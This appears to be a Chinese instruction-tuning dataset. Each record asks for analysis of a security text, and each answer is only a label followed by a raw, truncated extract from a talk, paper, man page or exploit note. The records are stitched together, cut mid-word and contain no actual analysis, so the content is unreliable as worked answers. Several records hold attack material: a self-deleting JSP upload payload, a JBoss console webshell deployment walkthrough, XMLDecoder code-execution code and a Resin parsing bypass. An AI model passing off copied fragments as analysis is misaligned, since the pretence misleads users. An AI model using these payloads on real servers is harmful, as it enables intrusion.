Reverse Engineering (FLARE) Team Speaker  Black Hat, MS Blue Hat, BSides LV and Augusta, DerbyCon Black Hat Trainer Microsoft MVP  PowerShell GitHub projects  PowerSploit, PowerShellArsenal, Position Independent Shellcode in C, etc. Living off the Land Proponent Perpetual n00b 7 Copyright  2015, FireEye, Inc. All rights reserved. About the Speakers Claudiu to the rescue Teodorescu - @cteo13 Reverse Engineer @ FireEye Labs Advanced Reverse Engineering (FLARE) Team Forensic researcher Crypto analyst GitHub projects  WMIParser Soccer player 8 Copyright  2015, FireEye, Inc. All rights reserved. Outline  Session #1 Background, Motivations, Attack Examples Abridged History of WMI Malware WMI Architecture WMI Query Language (WQL) WMI Eventing Remote WMI WMI Attack Lifecycle Provid", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nClimbing Everest Voting 101 Voting in the US  Highly decentralized:  Federal government sets broad standards  Each state has own laws, rules, requirements  Elections run by counties (>3000 in US)  Voting takes place in neighborhood precincts  tens, hundreds or thousands per county  Complex:  Typical election has many races  Precinct may have several different ballots Feds vs. States HAVA Pregnant Dimpled Hanging  Favorite HAVA quote: For States that do not use electronic equipment to assist voters with detecting errors, they must: Establish a voter education program Provide voter with instructions* *emphasis added Who are we? ES&S Structure Computerized Voting  Direct Recording Electronic (DRE)  specialized voting computer, typically with touch-screen interface  records voter selections internally  Precinct Counted Optical Scan  voter fills out a paper ballot (fill in circles)  ballot marking devices can assist disabled  voter inserts ballot into precinct ballot reader, which either accepts ballot and records vote or rejects and returns ballot to voter  Centrally (County) Counted Optical Scan  absentee ballots The Horror, the Horror Lines of Code vs. % of Market Share* ES&S - 670000+ - > 40% market share Premier- 334000+ - > 40% market share Other > 20% : Hart - 300000+ Sequoia - 800000+ *sorry, theres no correlation My Buffer Overfloweth If its good enough for a minibar Only 2 for the whole country Scanner Key Part Number #75506 Seals Any Port in a Storm Major Malfunction With a little token Well it has passwords and encryption. Anyone who considers arithmetical methods of producing random digits is, of course, in a state of sin -- John Von Neumann, 1951 Random numbers should not be generated with a method chosen at random -- Donald Knuth, The Art of Computer Programming Vol 2 The best defense against logic is ignorance -- anon Its not a backdoor, its a feature Photo Courtesy of Brickshelf.com im in ur DRE, changin ur votes Micahs hands Zippedy-do-dah Penn Lion Giv", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nauthor: pen4uin 开始之前 这篇文章(笔记)理论上是在两个月前就应该完成的由于前段时间手头活有点 多就给落下了 但是最近因为疫情防控的原因回了学校开始远程实习而且我的秋招也差 不多算结束了所以目前自我安排的时间相对来说毕竟富余正好趁国庆小长假好好 把前4个月(HW  现在)的笔记捋一捋总结归档也算是为这一年多的实习生活画 上一个句号调整心态迎接下一段\"社畜\"生活的开始 Resin \"特性\" 问题描述 测试文件 \"特性\"场景 step1-上传文件 在写某微OA的文件上传漏洞的EXP时发现上传jsp文件后即使jsp文件自删除后仍然 可以访问坑了我老半天时间去测试 # 文件内容 <%out.println(111111);new java.io.File(application.getRealPath(request.getServletPath())).d elete();%> # 效果 打印111111然后删除自己 step2-验证文件文件自删除 step3-再次访问依然成功此时硬盘上已无该jsp文件 原理分析 在访问所上传的jsp文件后会生成以下目录生成相关字节码 ecology\\WEB-INF\\work_jsp_formmode_apps_upload_ktree_images 字节码内容 /* * JSP generated by Resin-3.1.8 (built Mon, 17 Nov 2008 12:15:21 PST) */ package _jsp._formmode._apps._upload._ktree._images; import javax.servlet.*; import javax.servlet.jsp.*; import javax.servlet.http.*; public class _16266800368271276377871__jsp extends com.caucho.jsp.JavaPage { private static final java.util.HashMap<String,java.lang.reflect.Method> _jsp_functionMap = new java.util.HashMap<String,java.lang.reflect.Method>(); private boolean _caucho_isDead; public void _jspService(javax.servlet.http.HttpServletRequest request, javax.servlet.http.HttpServletResponse response) throws java.io.IOException, javax.servlet.ServletException { javax.servlet.http.HttpSession session = request.getSession(true); com.caucho.server.webapp.WebApp _jsp_application = _caucho_getApplication(); javax.servlet.ServletContext application = _jsp_application; com.caucho.jsp.PageContextImpl pageContext = _jsp_application.getJspApplicationContext().allocatePageContext(t his, _jsp_application, request, response, null, session, 8192, true, false); javax.servlet.jsp.PageContext _jsp_parentContext = pageContext; javax.servlet.jsp.JspWriter out = pageContext.getOut(); final javax.el.ELContext _jsp_env = pageContext.getELContext(); javax.servlet.ServletConfig config = getServletConfig(); javax.servlet.Servlet page = this; response.setContentType(\"text/html\"); try { out.println(111111);new java.io.File(application.getRealPath(request.getServl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nhead === 显示文件的开头部分 ## 概要 ```shell head [OPTION]... [FILE]... ``` ## 主要用途 - 在未指定行数时默认显示前10行 - 处理多个文件时会在各个文件之前附加含有文件名的行 - 当没有文件或文件为`-`时读取标准输入 ## 选项 ```shell -c, --bytes=[-]NUM 显示前NUM字节如果NUM前有\"-\"那么会打印除了文件末尾的NUM字节以外的其他内容 -n, --lines=[-]NUM 显示前NUM行而不是默认的10行如果NUM前有\"-\"那么会打印除了文件末尾的NUM行以外的其他行 -q, --quiet, --silent 不打印文件名行 -v, --verbose 总是打印文件名行 -z, --zero-terminated 行终止符为NUL而不是换行符 --help 显示帮助信息并退出 --version 显示版本信息并退出 NUM可以有一个乘数后缀 b 512 kB 1000 k 1024 MB 1000*1000 M 1024*1024 GB 1000*1000*1000 G 1024*1024*1024 TPEZY等以此类推 也可以使用二进制前缀 KiB=K MiB=M 以此类推 ``` ## 参数 FILE可选要处理的文件可以为一或多个 ## 返回值 返回0表示成功返回非0值表示失败 ## 例子 ```shell # 查看历史文件的前6行 [user2@pc ~]$ head -n 6 ~/.bash_history #1575425555 cd ~ #1575425558 ls -lh #1575425562 vi ~/Desktop/ZhuangZhu-74.txt ``` ```shell # 查看多个文件 [user2@pc ~]$ head -n ~/.bash_history ~/.bashrc ==> /allhome/user2/.bash_history <== #1575425555 cd ~ #1575425558 ls -lh #1575425562 vi ~/Desktop/ZhuangZhu-74.txt #1575425566 uptime #1575425570 find ~/ -maxdepth 3 -name 'test.sh' -exec lh {} \\; ==> /allhome/user2/.bashrc <== # .bashrc # forbid use Ctrl+D to exit shell. set -o ignoreeof # Source global definitions. if [ -f /etc/bashrc ]; then . /etc/bashrc fi ``` ### 注意 1. 该命令是`GNU coreutils`包中的命令相关的帮助信息请查看`man -s 1 head``info coreutils 'head invocation'`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1993 The Regents of the University of California. '\\\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: seek.n,v 1.2 2003/11/24 05:10:00 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbClass ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSlouching*Towards*Utopia:** The*State*of*the*Internet*Dream* * * Jennifer*S;sa*Granick* DEF*CON*24* centraliza;on* * regula;on* * globaliza;on*  Things'will'happen'no'one'will'really'know' why. **  The'Internet'is'TV'  Security'haves'and'have'nots'  Surveillance,'censorship'&'control'' * Declara;on*of*Independence*of* Cyberspace* * Governments*of*the*Industrial*World,*you*weary* giants*of*flesh*and*steel,*I*come*from* Cyberspace,*the*new*home*of*Mind.*On*behalf* of*the*future,*I*ask*you*of*the*past*to*leave*us* alone.*You*are*not*welcome*among*us.*You*have* no*sovereignty*where*we*gather.* The*Dream*of*Internet*Freedom*  Overcome*age,*race,*class,*and*gender*  Communicate*with*anyone,*anywhere*  Free*access*to*informa;on*  Hands*on*impera;ve*  Computers*will*liberate*us* * * * EQUALITY* * * * * FREEDOM*OF*EXPRESSION* * * * * OPEN*ACCESS* * * * FREEDOM*TO*TINKER* (THE*HANDS*ON*IMPERATIVE)* * * * * LIBERATION* The*Cycle* History*shows*a*typical*progression*of* informa;on*technologies*from*somebodys* hobby*to*somebodys*industry;*from*jury`rigged* contrap;on*to*slick*produc;on*marvel;*from*a* freely*accessible*channel*to*one*strictly* controlled*by*a*single*corpora;on*or*cartel** from*open*to*closed*system.** * * Privacy*&*Security* * * Encryp;on* The*Next*20*Years*  Things'will'happen'no'one'will'really'know' why. **  The'Internet'is'TV'  Security'haves'and'have'nots'  Surveillance,'censorship'&'control'' * *OR*  Think*globally*  Build*decentraliza;on*where*possible*  End*to*end*encryp;on*  Hands*off*private*tech*development*  Start*being*afraid*of*the*right*things*  CFAA,**DMCA,*USAPA,*FAA*  Start*crea;ng*the*technology*for*the*next* cycle*of*the*revolu;on** * * Ques;ons*and*Comments*", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 / 111 DAVIX The Data Analysis and Visualization Linux Version 0.5.0 Authors: Jan P. Monsch, jan döt monsch ät iplosion döt com Raffael Marty, raffy ät secviz döt org 2 / 111 Contents 1. DAVIX - Visualize Your Logs!..........................................................................4 1.1. Introduction ................................................................................................4 1.2. Roadmap ....................................................................................................4 2. Quick Start Guide...............................................................................................5 2.1. Download ...................................................................................................5 2.2. Burn ...........................................................................................................6 2.3. Boot............................................................................................................8 2.4. Analyze ......................................................................................................9 2.5. What to Do Next?.....................................................................................10 3. Tools - Showing You the Ropes .......................................................................12 3.1. AfterGlow (PV)........................................................................................13 3.2. ChartDirector (V) .....................................................................................15 3.3. Cytoscape (V)...........................................................................................16 3.4. EtherApe (V)............................................................................................18 3.5. GGobi (V) ................................................................................................19 3.6. glTail (V)..................................................................................................21", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# JBoss未授权访问漏洞 ## 漏洞描述 JBoss 是一个管理 EJB 的容器和服务器支持 EJB 1.1EJB 2.0 和 EJB3 的规范但 JBoss 核心服务不包括支持 [servlet](https://so.csdn.net/so/search?q=servlet&spm=1001.2101.3001.7020)/JSP 的 WEB 容器一般与 Tomcat 或 Jetty 绑定使用JBoss 默认在 8080 端口监听 在低版本的 JBoss 中默认可以访问 JBoss Web 控制台(http://IP:8080/jmx-console)无需用户名和密码通过 JBoss 未授权访问管理控制台的漏洞可以进行后台服务管理可以通过脚本命令执行系统命令如反弹 shellwget 写 Webshell 文件 ## 环境搭建 这里用CVE-2017-7504的漏洞环境启动环境 ``` [root@localhost CVE-2017-7504]# docker-compose up ``` 浏览器访问**8080**端口 ![image-20220519164112458](../../.gitbook/assets/image-20220519164112458.png) ## 漏洞复现 发现jboss默认页面,点击进入控制页 ![image-20220519164128954](../../.gitbook/assets/image-20220519164128954.png) 假设是未授权访问的话点击`JMX-Console`不会提示输入用户名密码而这个地方用的是别的漏洞的环境用户名密码都是adminadmin所以就假装是不用输入用户名密码的 ![image-20220519164230508](../../.gitbook/assets/image-20220519164230508.png) 往下找jboss.deployment进入应用部署页面 ![image-20220519164333567](../../.gitbook/assets/image-20220519164333567.png) 进入应用部署页面后下滑找到`void addURL()`这里`ParamValue`部分填写远程服务器上的木马的地址 ![image-20220519164708691](../../.gitbook/assets/image-20220519164708691.png) 访问`iceword`路径就可以看到webshell ![image-20220519165050177](../../.gitbook/assets/image-20220519165050177.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUTILIZING POPULAR WEBSITES FOR MALICIOUS PURPOSES USING RDI Daniel Chechik, Anat (Fox) Davidi Security Web Scanners What is RDI? 3 Reflected DOM Injection Legit Legit Malicious A Recipe for Disaster 4  1 simple web page  1 trustworthy web utility  1 script that behaves differently within a certain context  2 cups of funny cat pictures RDI in Action  Yahoo Cache 5 Yahoo Cache What Just Happened?! 6 Lets Take it a Step Further 7 Google Translate Go back in time (10 minutes ago) 8  Producing a malicious URL hosted on Google  We will be able to access it directly without the interface: hxxp://translate.google.com/translate? hl=en&sl=iw&tl=en&u=http%3A%2F %2Fhandei.ueuo.com%2Ftran.html What happens behind the scenes 9 Content is translated  After the text is translated, the malicious code is generated, decrypted and executed Lets Check Out the Code 10 script Bob Marley Generated Decrypted Executed Reflected DOM Injection 11  RDI is a technique  Context makes the difference  Very hard to detect  RDI is awesome! VirusTotal / Wepawet ? 12 Thank You! 13 Q & A Daniel Chechik: dchechik@trustwave.com @danielchechik Anat (Fox) Davidi: adavidi@trustwave.com @afoxdavidi More Cats!", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nXMLDecoder反序列化 XMLEncode序列化 package com.example; import java.io.IOException; import java.util.ArrayList; import java.util.HashMap; public class XMLEncoder { public static void main(String[] args) throws IOException { HashMap<Object, Object> hashMap = new HashMap<>(); ArrayList<Object> arrayList = new ArrayList<>(); arrayList.add(\"test\"); arrayList.add(\"demo\"); Process exec = Runtime.getRuntime().exec(new String[]{\"cmd.exe\", \"/c\", \"whoami\"}); //Process exec = new ProcessBuilder(\"cmd.exe\",\"/c\",\"whoami\").start(); hashMap.put(\"123\",\"456\"); hashMap.put(\"678\",arrayList); hashMap.put(\"runtime\",exec); java.beans.XMLEncoder xmlEncoder = new java.beans.XMLEncoder(System.out); xmlEncoder.writeObject(hashMap); xmlEncoder.close(); } } /* java.lang.InstantiationException: java.lang.ProcessImpl Continuing ... java.lang.RuntimeException: failed to evaluate: <unbound>=Class.new(); Continuing ... <?xml version=\"1.0\" encoding=\"UTF-8\"?> <java version=\"1.8.0_301\" class=\"java.beans.XMLDecoder\"> <object class=\"java.util.HashMap\"> <void method=\"put\"> <string>123</string> <string>456</string> </void> <void method=\"put\"> <string>678</string> <object class=\"java.util.ArrayList\"> <void method=\"add\"> <string>test</string> </void> <void method=\"add\"> <string>demo</string> </void> </object> </void> </object> </java> 一开始想直接序列化一个 Runtime 对象后来发现这个对象不能被 Encoder 转而通过调用底层 的 ProcessBuilder 对象进行 Encoder 发现还是会报错原因是最底层的 java.lang.ProcessImpl 没办法通过创建一个对象所有最后只能通过 Encoder 的数据格式来 构造反序列化的 payload  XMLDecode 反序列化 */ package com.example; import java.io.IOException; import java.io.InputStream; import java.io.StringBufferInputStream; import java.nio.charset.StandardCharsets; import java.util.HashMap; public class XMLDecoder { public static void main(String[] args) { String encode= \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\\n\" + \"<java version=\\\"1.8.0_301\\\" class=\\\"java.beans.XMLDecoder\\\">\\n\" + \" <object class=\\\"java.util.HashMap\\\">\\n\" + \" <void method=\\\"put\\\">\\n\" + \" <string>123</string>\\n\" + \" <string>456</string", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 OLONLXOL-Resin解析漏洞 初学JAVA有问题请指正 受影响版本全版本 之前测试resin的权限绕过时提到过可以采下的式 后来在北京玩的时候突然想到那我可不可以和 iis解析漏洞 样创建个件夹为 test.jsp 下存放个 jsp 后缀件但是 Resin 能解析呢 回来测试了下发现可以 Plain Text 复制代码 /test.jsp /test.jsp/1.css 1 2 2 得到如下结论 看下问题出在哪先查看 Resin 的配置件 Plain Text 复制代码 /test.jsp/test.jpg test.jsp 件夹下的件都会解析成jsp 1 2 3 注意到三个 servlet-mapping 分别是 *.jsp *.jspx *.jspf 对应的 servlet-class 都为 com.caucho.jsp.JspServlet 那代表还存在另外两种利式 配置 Resin 远程调试查看下原因 Plain Text 复制代码 /test.jspx/test.jpg /test.jspf/test.jpg test.jspf test.jspx件夹下的件都会解析成jsp 1 2 3 4 D:\\tomcat\\resin-4.0.65\\conf\\resin.xml 在 Resin 的配置件添加下的内容 IDEA配置好远程JVM调试因为我们不知道具体处理流程在哪所以断点下在 \\com\\caucho\\server\\http\\HttpRequest.class#handleRequest 慢慢跟直到 \\com\\caucho\\server\\dispatch\\ServletMapper.class#mapServlet 跟进去然后跟到 5 这先从我们配置件取 servlet-mapping 的值然后正则匹配我们请求的 uri 可以注意 到这个正则 .*\\.jsp(?=/)|.*\\.jsp\\z 此时会匹配到 /test1.jsp 会返回 ServletMapping[url-pattern=*.jsp, name=resin-jsp] 从进jsp处理逻辑 .*\\.jsp(?=/)|.*\\.jsp\\z 这个正则在 \\com\\caucho\\server\\dispatch\\UrlMap.class#addMap 被添加 6 Java 复制代码 public void addMap(String pattern, String flags, E value, boolean isIgnore, boolean ifAbsent) throws PatternSyntaxException { if (pattern.length() == 0) { this.addRegexp(-1, \"/$\", flags, value, true, isIgnore, ifAbsent); } else { boolean startsWithSlash = pattern.charAt(0) == '/'; if (pattern.length() == 1 && startsWithSlash) { this.addRegexp(-1, \"\", flags, value, true, isIgnore, ifAbsent); } else if (pattern.equals(\"/*\")) { this.addRegexp(1, \"/*\", flags, value, true, isIgnore, ifAbsent); } else { int length = pattern.length(); boolean isExact = true; if (!startsWithSlash && pattern.charAt(0) != '*') { pattern = \"/\" + pattern; ++length; } int prefixLength = -1; boolean isShort = false; boolean hasWildcard = false; CharBuffer cb = new CharBuffer(); cb.append(\"\"); for(int i = 0; i < length; ++i) { char ch = pattern.charAt(i); if (ch == '*' && i + 1 == length && i > 0) { hasWildcard = true; isExact = false; if (pattern.charAt(i - 1) == '/') { cb.setLength(cb.length() - 1); if (prefixLength < 0) { ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 0x00 简介 本章简单的介绍一下sleep2.1的语法主要是写给跟我一样不会英语的朋友用在编写脚本上大家可以查询文档http://sleep.dashnine.org/download/sleep21manual.pdf 用pdf方便搜索函数,本文只是简单的介绍语法想深入学习的还请看官方文档AggressorScripts主要是对CS提供的函数的一些调用所以用不到太多的sleep相关的 大家也可以下载sleep.jar 来测试语法 # 0x01 sleep 2.1 基本语法 ### 打印 都先来学习 打印hello word吧 ``` println(\"Hello World\") ``` `load` 加载 `x` 用于调试函数 ``` $ java -jar sleep.jar >> Welcome to the Sleep scripting language > help debug [script] <level> env [functions/other] [regex filter] help [command] interact list load <file> unload <file> tree [key] quit version x <expression> ? <predicate expression> > load 1.txt G:\\教程\\Cobalt Strike2\\img\\1.txt loaded successfully. Hello World ``` ### 变量 定义变量用`$` ``` > interact >> Welcome to interactive mode. Type your code and then '.' on a line by itself to execute the code. Type Ctrl+D or 'done' on a line by itself to leave interactive mode. $name = \"404\"; println($name); . 404 ``` ### 运算 ``` $x = 5 + \"1\"; $x = 5 - $y; $x = $x * $2; $x = $z / 9.9; $x = $1 % 3; # modulus $x = $1 ** 4; # exponentation ``` 字符串 ``` $x = \"Ice\" . \"cream\"; 组合 \"Icecream\" $x = \"abc\" x 3; abcabcabc ``` ### 数组 定义一个数组用 `@` ``` @foo = @(\"a\", \"b\", \"c\"); $x = @foo[1]; println($x); . b ``` ### Hash Scalars 类似字典 ``` %bar = %(x => \"x-ray\", y => \"yabboes\"); ``` ### 函数 定义函数 `sub function` 参数为`$1,$2,$3` ``` sub add { $a = $1; println($a); } ``` ### if-else 条件判断 ``` $nub = 1; $nub2 = 2; if ($nub>$nub2) { println(\"1>2\"); } else { println(\"1<2\"); } ``` ### 逻辑运算符 `and(&&)` `or(||)` ``` sub check { if (($1 > 0) && ($2 <= 10)) { println(\"$1 is within 0 .. 10\"); } else { println(\"$1 $2 is out of range!!\"); } } ``` ### 循环语句 For 循环 ``` for ($total = 99; $total > 0; $total--) { println($total); } ``` while 循环 ``` $total = 99; while ($total > 0) { println($total); } ``` Foreach 循环 ``` %data = %(foo => \"a\", bar => \"b\", baz => \"c\", jaz => \"d\"); foreach $key => $value (%data) { println($key); } ``` # 0x02 sleep 2.1 函数 这里我就不讲了 看官网文档把自己想用什么函数搜索下,不会英语就机翻下,大概就知道了 # 0x02 文末 ### 本文如有错误请及时提醒以免误导他人", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport java.rmi.RemoteException; import java.rmi.server.UnicastRemoteObject; import java.util.List; public class Calc extends UnicastRemoteObject implements ICalc { public Calc() throws RemoteException { super(64000); } public Integer sum(List<Integer> params) throws RemoteException { Integer sum = 0; for (Integer param : params) { sum += param; } return sum; } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhite Paper: Generic, Decentralized, Unstoppable Anonymity: The Phantom Protocol Author: Magnus Bråding Version: 0.7 2008-08-04 1(68) Generic, Decentralized, Unstoppable Anonymity: The Phantom Protocol White Paper: Generic, Decentralized, Unstoppable Anonymity: The Phantom Protocol Author: Magnus Bråding Version: 0.7 2008-08-04 2(68) 1. Abstract Recent years, and especially this past year, have seen a notable upswing in developments toward anti-online privacy around the world, primarily in the form of draconian surveillance and censorship laws (both legislated and suggested) and ISPs being pressured into individually acting as both police and informants for various commercial interests. Once such first steps have been taken, it is of course also of huge concern how these newly created possibilities could be used outside of their originally stated bounds, and what the future of such developments may hold in store for online privacy. There are no signs of this trend being broken anytime soon. Combined with the ever growing online migration of everything in general, and privacy sensitive activities in particular (like e.g. voting, all nature of personal and interpersonal discussions, and various personal groupings), this trend will in turn unavoidably lead to a huge demand for online anonymization tools and similar means of maintaining privacy. However, if not carefully designed, such anonymization tools will, ultimately, be easy targets for additional draconian legislation and directed [il]legal pressure from big commercial and political interests. Therefore, a well-conceived, robust and theoretically secure design for such an anonymization protocol and infrastructure is needed, which is exactly what is set out to be done with this project. What is presented in this paper is the design of a protocol and complete system for anonymi- zation, intended as a candidate for a free, open, community owned, de facto anonymization standard, aimed at improving on existing solutio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacker'Machine,Interface, State,of,the,Union,for,SCADA,HMI,Vulnerabili:es, Copyright,2016,Trend,Micro,Inc., 2, Introduc:on, Copyright,2016,Trend,Micro,Inc., 3, Trend,Micro,Zero,Day,Ini:a:ve,  Fritz,Sands,',@FritzSands,  Security)Researcher))Zero)Day)Ini4a4ve)  Root)cause)analysis)and)vulnerability)discovery)  Focused)on)SCADA)HMI)vulnerability)analysis)  Brian,Gorenc,',@maliciousinput,  Senior)Manager)?)Zero)Day)Ini4a4ve)  Root)cause)analysis)and)vulnerability)discovery)  Organizer)of)Pwn2Own)hacking)compe44ons) Copyright,2016,Trend,Micro,Inc., 4, SCADA,Industry, Copyright,2016,Trend,Micro,Inc., 5, Marketplace,Overview,,  Focused,on,ICS,equipment,sales,over,soTware,sales,  Ac:ve,merger,and,acquisi:on,ac:vity,,  Highly,regionalized,, Copyright,2016,Trend,Micro,Inc., 6, What,is,the,Human,Machine,Interface?,  Main,hub,for,managing,and,opera:ng,control,systems,  Collects,data,from,the,control,systems,  Presents,visualiza:on,of,the,system,architecture,  Alarms,operator/sends,no:fica:ons,  Should,be,operated,on,isolated,and,trusted,networks,  but,it,usually,isnt!, Copyright,2016,Trend,Micro,Inc., 7, Why,target,the,Human,Machine,Interface?,  Control,the,targeted,cri:cal,infrastructure,  Harvest,informa:on,about,architecture,  Disable,or,deceive,the,alarm,and,no:fica:on,systems,  Physically,damage,SCADA,equipment, Copyright,2016,Trend,Micro,Inc., 8, Malware,Targe:ng,HMI,Solu:ons,  Stuxnet,  First,malware,created,to,target,ICS,environments,  Abused,vulnerabili:es,  Siemems,SIMATIC,STEP,7,DLL,Hijacking,Vulnerability,(ICSA'12'205'02),  Siemens,WinCC,Insecure,SQL,Server,Authen:ca:on,(ICSA'12'205'01),  ,BlackEnergy,  Ongoing,sophis:cated,malware,campaign,compromising,ICS,environments,  Abused,vulnerabili:es,  GE,CIMIPCITY,Path,Traversal,Vulnerabili:es,(ICSA'14'023'01),  Siemens,WinCC,Remote,Code,Execu:on,Vulnerabili:es,(ICSA'14'329'02D),  Advantech,WebAccess,(ICS'ALERT'14'281'01B), Copyright,2016,Trend,Micro,Inc., 9, ICS'CERT,  Organiza:on,within,Department,of,Homeland,Security,  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSCADA and ICS for Security Experts: How to Avoid Cyberdouchery James Arlen, CISA DEF CON 18 - Las Vegas - 2010 1 Disclaimer I am employed in the Infosec industry, but not authorized to speak on behalf of my employer or clients. Everything I say can be blamed on great food, mind-control and jet lag. 2 Credentials 15+ years information security specialist staff operations, consultant, auditor, researcher utilities vertical (grid operations, generation, distribution) financial vertical (banks, trust companies, trading) some hacker related stuff like game show host, etc. ...still not an expert at anything. 3 1/ Stop Sounding Stupid 4 Scada got sexy 5 Follow the money 6 Who's an expert now? 7 One time at security camp 8 Gotta get me a piece of that 9 Gotta get me a piece of that 10 2/ Big Things and Little Things 11 Not all scada is SCADA 12 Big things: power grid 13 Big things: pipeline 14 Inter- connected sensors and controls under central management 15 Inter- connected sensors and controls under central management 16 Supervisory control and data acquisition 17 Little Things: chemical plant, power plant, manufacturing facility 18 Little Things: chemical plant, power plant, manufacturing facility 19 Little Things: chemical plant, power plant, manufacturing facility 20 Little Things: chemical plant, power plant, manufacturing facility 21 Little Things: chemical plant, power plant, manufacturing facility 22 Little Things: chemical plant, power plant, manufacturing facility 23 Lots of individual capabilities with some orchestration 24 Programmable logic controllers 25 Programmable logic controllers 26 Programmable logic controllers 27 Industrial control systems/ Distributed control systems 28 3/ Part of a Bigger Picture 29 So if you break the computer, you break everything 30 What happens when Edna falls into the reactant vessel 31 This is the data 32 This is the data 33 This is the process 34 This is the process 35 This is the process 36 I know you can grok the protocol, ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDDoS Black and White Kungfu Revealed (DEF CON 20 Edition) {Tony Miu (aka MT), Anthony Lai (aka Darkfloyd), Alan Chung (aka Avenir), Kelvin Wong (aka Captain)} Valkyrie-X Security Research Group (VXRL) Disclaimer  There is no national secrets leaked here.  Welcome to all national spies   No real attacks are launched  Please take it at your own risk. We can't save you from the jail Agenda  Members introduction  Research and Finding  Part 1: Layer-7 DoS vulnerability analysis and discovery.  Part 2: Powerful Zombie  Part 3: Defense Model Biographies Tony Miu (aka MT) Apart from a being a researcher at VXRL, MT currently holds the post of Deputy SOC Manager at Nexusguard Limited, a global provider of premium end to end web security solutions that specializes in Anti-DDoS & web application security services. Throughout his tenure, MT has been at the forefront of the cyber war zone - responding to and mitigating myriads of cyber attacks that comes in all forms and manners targeted at crushing their clients' online presence. MT's task is clearly critical. It is therefore imperative that MT be well versed in the light and dark sides of DDoS attack methodologies and undertakes many leading role in both DDoS kungfu and defense model projects. Biographies Anthony Lai (aka Darkfloyd)  focuses on reverse engineering and malware analysis as well as penetration testing. His interest is always falling on CTF and analyzing targeted attacks.  He has spoken in Black Hat USA 2010, DEF CON 18 and 19, AVTokyo 2011, Hack In Taiwan 2010 and 2011 and Codegate 2012.  His most recent presentation at DEF CON was about APT Secrets in Asia. Biographies Alan Chung (aka Avenir)  Avenir has more than 8 years working experience on Network Security. He currently is working as a Security Consultant for a Professional Service provider.  Alan specializes in Firewall, IDS/IPS, network analysis, pen-test, etc. Alans research interests are Honeypots, Computer Forensics, Telecommunication etc. Biographies K", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPillaging DVCS Repos Adam Baldwin INTRODUCTION Distributed Version Control Systems (DVCS) including Git, Mercurial (HG), and Bazaar (BZR) are becoming increasingly popular and also a convenient method of deploying updates to web applications. DVCS track revision history and other information about the repository inside a meta directory. In some cases the meta directory is left inside the web root of the website unprotected. This information could be very valuable to an attacker or as part of a penetration test. OBJECTIVE The goal of this research was to identify methods in which information could be remotely extracted from the exposed meta directory and recreate as much of the repository state as possible. REPOSITORY IDENTIFICATION The first step in our process was to remotely and reliably identify the presence of an exposed DVCS meta directory. It was found that each DVCS we tried had a predictable set of file names, paths and contents. Using this information we created a set of regular expressions to identify a positive match. 